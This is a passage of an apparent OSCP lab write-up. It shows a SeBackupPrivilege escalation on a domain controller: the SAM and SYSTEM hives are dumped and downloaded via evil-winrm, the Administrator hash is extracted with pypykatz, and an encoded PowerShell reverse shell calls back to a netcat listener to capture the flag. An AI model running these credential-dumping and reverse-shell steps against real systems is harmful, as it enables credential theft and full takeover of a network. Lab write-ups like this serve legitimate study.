PS C:\Users\d.chambers\Documents> 

I exploit the SeBackupPrivilege and SeRestorePrivilege privileges, following the guide at https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

I connect to the DC via evil-winrm:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ sudo evil-winrm -i 192.168.229.158 -u d.chambers         
Enter Password: 

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\d.chambers\Documents>

I proceed with the following steps:

Bash
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

I save the sam and system files to the Kali machine:

Bash
cd Temp
download sam
download system

I run:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ sudo pypykatz registry --sam sam system  

This way I recovered the Administrator user's hash, and I use it to connect via evil-winrm. I create a new reverse shell to the listener on port 4477:

Text Only
*Evil-WinRM* PS C:\Users\Administrator\Documents> powershell -e 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

And I retrieve the DC flag:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ nc -nvlp 4477
listening on [any] 4477 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.229.158] 54985

PS C:\Users\Administrator\Documents> whoami
zeus\administrator
PS C:\Users\Administrator\Documents> cd ..\Desktop
PS C:\Users\Administrator\Desktop> type proof.txt
ab69e8ee95559ec318512d4304862125
PS C:\Users\Administrator\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::c758:61d8:60d:1552%12
   IPv4 Address. . . . . . . . . . . : 192.168.229.158
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254
PS C:\Users\Administrator\Desktop> 